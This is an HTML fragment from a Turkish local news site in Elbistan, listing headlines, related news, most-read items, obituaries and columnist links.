            <span class="hs-o-bgc"  style="font-size:">Otomobille kamyonet çarpıştı: 2 yaralı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/fore-kazik-uygulamasi-1-milyon-958-bin-liraya-mal-olacak-h73383.html" title="Fore kazık uygulaması 1 milyon 958 bin liraya mal olacak">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/fore_kazik_uygulamasi_1_milyon_958_bin_liraya_mal_olacak_h73383_0b4b0.JPG" alt="Fore kazık uygulaması 1 milyon 958 bin liraya mal olacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Fore kazık uygulaması 1 milyon 958 bin liraya mal olacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/polisler-kan-bagisinda-bulundu-2-h73382.html" title="Polisler kan bağışında bulundu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/polisler_kan_bagisinda_bulundu_h73382_02db6.JPG" alt="Polisler kan bağışında bulundu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Polisler kan bağışında bulundu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/hoca-ahmet-yesevi-ilkokulundan-e-twinning-projesi-h73381.html" title="Hoca Ahmet Yesevi İlkokulu’ndan e-Twinning projesi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2022/04/hoca_ahmet_yesevi_ilkokulundan_e_twinning_projesi_h73381_71110.jpg" alt="Hoca Ahmet Yesevi İlkokulu’ndan e-Twinning projesi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Hoca Ahmet Yesevi İlkokulu’ndan e-Twinning projesi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="https://www.elbistaninsesi.com/haberleri/Hakim+ve+savc%C4%B1lar" title="Hakim Ve Savcılar haberleri">Hakim Ve Savcılar</a><a href="https://www.elbistaninsesi.com/haberleri/Suriyeye+giden+P%C3%96Hleri+u%C4%9Furlad%C4%B1" title="Suriyeye Giden PÖHleri Uğurladı haberleri">Suriyeye Giden PÖHleri Uğurladı</a></div>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/kuzey-ilceleri-yatirim-degerlendirme-toplantisi-elbistanda-yapildi-h73414.html"  title="Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/kuzey_ilceleri_yatirim_degerlendirme_toplantisi_elbistanda_yapildi_h73414_c7388.JPG" alt="Kuzey İlçeleri Yatırım Değerlendirme Toplantısı Elbistan’da yapıldı" />
        <span>Kuzey İlçeleri Yatırım Değerlendirme Toplantısı...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/oztunc-tan-toplantiya-davet-edilmeme-tepkisi-h73413.html"  title="Öztunç&#039;tan toplantıya davet edilmeme tepkisi">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/oztunc_tan_toplantiya_davet_edilmeme_tepkisi_h73413_c0661.jpg" alt="Öztunç&#039;tan toplantıya davet edilmeme tepkisi" />
        <span>Öztunç&#039;tan toplantıya davet edilmeme tepkisi</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/marleo-lenardit-ve-organik-tarim-topraklara-bereket-katacak-h73411.html"  title="Marleo Lenardit ve Organik Tarım, topraklara bereket katacak">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/marleo_lenardit_ve_organik_tarim_topraklara_bereket_katacak_h73411_f7a65.JPG" alt="Marleo Lenardit ve Organik Tarım, topraklara bereket katacak" />
        <span>Marleo Lenardit ve Organik Tarım, topraklara bereket...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/kuyuya-dusen-tilki-kurtarildi-h73410.html"  title="Kuyuya düşen tilki kurtarıldı">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/kuyuya_dusen_tilki_kurtarildi_h73410_0302e.jpg" alt="Kuyuya düşen tilki kurtarıldı" />
        <span>Kuyuya düşen tilki kurtarıldı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/kurak-avinda-yakalanan-sahsa-6-bin-lira-ceza-h73409.html"  title="Kurak avında yakalanan şahsa 6 bin lira ceza">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/kurak_avinda_yakalanan_sahsa_6_bin_lira_ceza_h73409_803ad.jpg" alt="Kurak avında yakalanan şahsa 6 bin lira ceza" />
        <span>Kurak avında yakalanan şahsa 6 bin lira ceza</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/malatyadaki-deprem-elbistanda-da-hissedildi-h73408.html"  title="Malatya’daki deprem, Elbistan’da da hissedildi">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/malatyadaki_deprem_elbistanda_da_hissedildi_h73408_4f142.jpg" alt="Malatya’daki deprem, Elbistan’da da hissedildi" />
        <span>Malatya’daki deprem, Elbistan’da da hissedildi</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/konyali-hayirseverden-elbistandaki-ailelere-un-yardimi-h73407.html"  title="Konyalı hayırseverden Elbistan’daki ailelere un yardımı">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/konyali_hayirseverden_elbistandaki_ailelere_un_yardimi_h73407_9c7e6.jpg" alt="Konyalı hayırseverden Elbistan’daki ailelere un yardımı" />
        <span>Konyalı hayırseverden Elbistan’daki ailelere un...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/kent-konseyi-stklarla-iftarda-bulustu-h73406.html"  title="Kent Konseyi, STK’larla iftarda buluştu">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/kent_konseyi_stklarla_iftarda_bulustu_h73406_458c5.jpg" alt="Kent Konseyi, STK’larla iftarda buluştu" />
        <span>Kent Konseyi, STK’larla iftarda buluştu</span>
      </a>
    </div>
      </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="https://www.elbistaninsesi.com/images/sayfalar/4-Nisan-2022.jpg" title="Elbistanın Sesi - 04.04.2022 Manşeti" target="_blank"><img src="https://www.elbistaninsesi.com/images/sayfalar/thumb_4-Nisan-2022.jpg" alt="Elbistanın Sesi - 04.04.2022 Manşeti" /></a>
           </div>
  </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">101</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="last en-hidden en-visible"><a href="https://www.elbistaninsesi.com/guncel/hafif-ticari-arac-ceyhan-nehrine-dustu-1-olu-2-agir-yarali-h73240.html" title="Hafif ticari araç Ceyhan Nehrine..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/hafif_ticari_arac_ceyhan_nehrine_dustu_olu_ve_yaralilar_var_h73240_495d6.jpg" alt="Hafif ticari araç Ceyhan Nehrine..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/hafif-ticari-arac-ceyhan-nehrine-dustu-1-olu-2-agir-yarali-h73240.html" title="" ><span class="en-hit">1.</span> <strong>Hafif ticari araç Ceyhan Nehri’ne...</strong> <span class="en-spot en-hidden">Elbistan’da sürücüsünün direksiyon hakimiyetini kaybettiği hafif...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/25-yasindaki-genc-canina-kiydi-h73396.html" title="25 yaşındaki genç, canına kıydı" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/04/25_yasindaki_genc_canina_kiydi_h73396_7d36c.jpg" alt="25 yaşındaki genç, canına kıydı" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/25-yasindaki-genc-canina-kiydi-h73396.html" title="" ><span class="en-hit">2.</span> <strong>25 yaşındaki genç, canına kıydı</strong> <span class="en-spot en-hidden">Ekinözü’nde 25 yaşındaki genç, evlerinin 1 kilometre uzağındaki...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/bu-gune-kadarki-en-buyuk-yaban-kecisi-surusu-ile-kurtlar-ayni-h73313.html" title="Bu güne kadarki en büyük yaban keçisi..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/bu_gune_kadarki_en_buyuk_yaban_kecisi_surusu_ile_kurtlar_ayni_karede_h73313_30a58.jpg" alt="Bu güne kadarki en büyük yaban keçisi..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/bu-gune-kadarki-en-buyuk-yaban-kecisi-surusu-ile-kurtlar-ayni-h73313.html" title="" ><span class="en-hit">3.</span> <strong>Bu güne kadarki en büyük yaban keçisi...</strong> <span class="en-spot en-hidden">Elbistan’da, yoğun koruma çalışmaları sayesinde popülasyonu artış...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/muhammet-kucuk-berber-20-yasinda-h73310.html" title="Muhammet Küçük (Berber) 20 Yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/muhammet_kucuk_berber_20_yasinda_h73310_4889c.jpg" alt="Muhammet Küçük (Berber) 20 Yaşında" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/muhammet-kucuk-berber-20-yasinda-h73310.html" title="" ><span class="en-hit">4.</span> <strong>Muhammet Küçük (Berber) 20 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/bugday-ve-arpa-ureticisine-ek-destek-h73129.html" title="Buğday ve arpa üreticisine ek destek" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/bugday_ve_arpa_ureticisine_ek_destek_h73129_cc0b9.jpg" alt="Buğday ve arpa üreticisine ek destek" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/bugday-ve-arpa-ureticisine-ek-destek-h73129.html" title="" ><span class="en-hit">5.</span> <strong>Buğday ve arpa üreticisine ek destek</strong> <span class="en-spot en-hidden">Türkiye tarım havzaları üretim ve destekleme modeli kapsamında 2021...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="https://www.elbistaninsesi.com/vefatlar/sakir-ozpolat-h73260.html" title="Şakir Özpolat" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/sakir_ozpolat_h73260_d3fdb.jpg" alt="Şakir Özpolat"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/sakir-ozpolat-h73260.html" title="" ><span class="en-hit">1.</span> <strong>Şakir Özpolat</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html" title="Mustafa Atasayar 70 Yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/mustafa_atasayar_70_yasinda_h73191_9c831.jpg" alt="Mustafa Atasayar 70 Yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html" title="" ><span class="en-hit">2.</span> <strong>Mustafa Atasayar 70 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/sefer-yuzbasi-84-yasinda-h73113.html" title="Sefer Yüzbaşı 84 yaşında," class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/sefer_yuzbasi_84_yasinda_h73113_75adf.jpg" alt="Sefer Yüzbaşı 84 yaşında,"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/sefer-yuzbasi-84-yasinda-h73113.html" title="" ><span class="en-hit">3.</span> <strong>Sefer Yüzbaşı 84 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/kenan-ugur-68-yasinda-2-h73299.html" title="Kenan Uğur 68 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/kenan_ugur_68_yasinda_h73299_6cea4.jpg" alt="Kenan Uğur 68 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/kenan-ugur-68-yasinda-2-h73299.html" title="" ><span class="en-hit">4.</span> <strong>Kenan Uğur 68 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/muhammet-kucuk-berber-20-yasinda-h73310.html" title="Muhammet Küçük (Berber) 20 Yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/muhammet_kucuk_berber_20_yasinda_h73310_4889c.jpg" alt="Muhammet Küçük (Berber) 20 Yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/muhammet-kucuk-berber-20-yasinda-h73310.html" title="" ><span class="en-hit">5.</span> <strong>Muhammet Küçük (Berber) 20 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="https://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/olmedigime-gore-makale,6620.html" title="ÖLMEDİĞİME GÖRE" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/hamdiyuce.jpg" alt="Hamdi YÜCE">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/106/hamdi-yuce" title="Hamdi YÜCE">Hamdi YÜCE</a></h4>
              <a href="https://www.elbistaninsesi.com/olmedigime-gore-makale,6620.html" title="ÖLMEDİĞİME GÖRE" >ÖLMEDİĞİME GÖRE</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/dostluk-makale,6619.html" title="DOSTLUK" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/yazar_kadın-1.jpg" alt="Nazife YETİŞGEN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/103/nazife-yetisgen" title="Nazife YETİŞGEN">Nazife YETİŞGEN</a></h4>
              <a href="https://www.elbistaninsesi.com/dostluk-makale,6619.html" title="DOSTLUK" >DOSTLUK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/bir-izmir-gazetesinin-sayfalarinda-yasayan-1938-elbistan-i-makale,6618.html" title="Bir İzmir gazetesinin sayfalarında yaşayan 1938 Elbistan&#039;ı" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Omer-Hakan-Ozalp_009_1.jpg" alt="Ömer Hakan Özalp">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/42/omer-hakan-ozalp" title="Ömer Hakan Özalp">Ömer Hakan Özalp</a></h4>
              <a href="https://www.elbistaninsesi.com/bir-izmir-gazetesinin-sayfalarinda-yasayan-1938-elbistan-i-makale,6618.html" title="Bir İzmir gazetesinin sayfalarında yaşayan 1938 Elbistan&#039;ı" >Bir İzmir gazetesinin sayfalarında yaşayan 1938 Elbistan&#039;ı</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ara-tatil-ve-ailelere-oneriler-makale,6617.html" title="ARA TATİL VE AİLELERE ÖNERİLER" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/tuğba.jpg" alt="Tuğba Arıkan">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/101/tugba-arikan" title="Tuğba Arıkan">Tuğba Arıkan</a></h4>
              <a href="https://www.elbistaninsesi.com/ara-tatil-ve-ailelere-oneriler-makale,6617.html" title="ARA TATİL VE AİLELERE ÖNERİLER" >ARA TATİL VE AİLELERE ÖNERİLER</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-43-makale,6615.html" title="TECRÜBE İLE SABİT-43-" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-43-makale,6615.html" title="TECRÜBE İLE SABİT-43-" >TECRÜBE İLE SABİT-43-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/hazan-yapraklari-makale,6614.html" title="HAZAN YAP­RAK­LA­RI" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="https://www.elbistaninsesi.com/hazan-yapraklari-makale,6614.html" title="HAZAN YAP­RAK­LA­RI" >HAZAN YAP­RAK­LA­RI</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/orucum-dersin-makale,6613.html" title="ORU­CUM DERSİN" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/İsimsiz-1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="https://www.elbistaninsesi.com/orucum-dersin-makale,6613.html" title="ORU­CUM DERSİN" >ORU­CUM DERSİN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/bilmem-gucum-yeter-mi-makale,6612.html" title="BİLMEM GÜCÜM YETER Mİ?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/eyyupceran_1.jpg" alt="Eyyup Ceran">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/105/eyyup-ceran" title="Eyyup Ceran">Eyyup Ceran</a></h4>
              <a href="https://www.elbistaninsesi.com/bilmem-gucum-yeter-mi-makale,6612.html" title="BİLMEM GÜCÜM YETER Mİ?" >BİLMEM GÜCÜM YETER Mİ?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/alemin-alemi-makale,6611.html" title="ALEMİN ALEMİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="https://www.elbistaninsesi.com/alemin-alemi-makale,6611.html" title="ALEMİN ALEMİ" >ALEMİN ALEMİ</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/cumhurbaskanimiz-sayin-recep-tayyip-erdogan-soz-sahipligi-yonunden-dunya-lideri-oldu-makale,6610.html" title="CUMHURBAŞKANIMIZ SAYIN RECEP TAYYİP ERDOĞAN: SÖZ SAHİPLİĞİ YÖNÜNDEN DÜNYA LİDERİ OLDU:   " >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/cumhurbaskanimiz-sayin-recep-tayyip-erdogan-soz-sahipligi-yonunden-dunya-lideri-oldu-makale,6610.html" title="CUMHURBAŞKANIMIZ SAYIN RECEP TAYYİP ERDOĞAN: SÖZ SAHİPLİĞİ YÖNÜNDEN DÜNYA LİDERİ OLDU:   " >CUMHURBAŞKANIMIZ SAYIN RECEP TAYYİP ERDOĞAN: SÖZ SAHİPLİĞİ YÖNÜNDEN DÜNYA LİDERİ OLDU:   </a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ramazan-ayi-makale,6609.html" title="RAMAZAN AYI" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="https://www.elbistaninsesi.com/ramazan-ayi-makale,6609.html" title="RAMAZAN AYI" >RAMAZAN AYI</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/vasiyet-etti-ve-makale,6607.html" title="VASİYET ETTİ VE..." >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
              <a href="https://www.elbistaninsesi.com/vasiyet-etti-ve-makale,6607.html" title="VASİYET ETTİ VE..." >VASİYET ETTİ VE...</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/usandim-makale,6602.html" title="USAN­DIM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="https://www.elbistaninsesi.com/usandim-makale,6602.html" title="USAN­DIM" >USAN­DIM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/gecmisim-su-anim-ve-gelecegim-makale,6600.html" title="GEÇMİŞİM ŞU ANIM VE GE­LE­CEGİM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="https://www.elbistaninsesi.com/gecmisim-su-anim-ve-gelecegim-makale,6600.html" title="GEÇMİŞİM ŞU ANIM VE GE­LE­CEGİM" >GEÇMİŞİM ŞU ANIM VE GE­LE­CEGİM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/beni-olsaydim-o-ilcenini-reisi-makale,6598.html" title="BENİ OL­SAY­DIM O İLÇENİNİ REİSİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Yair_arYkan.jpg" alt="Şahin ARIKAN">
            </div>
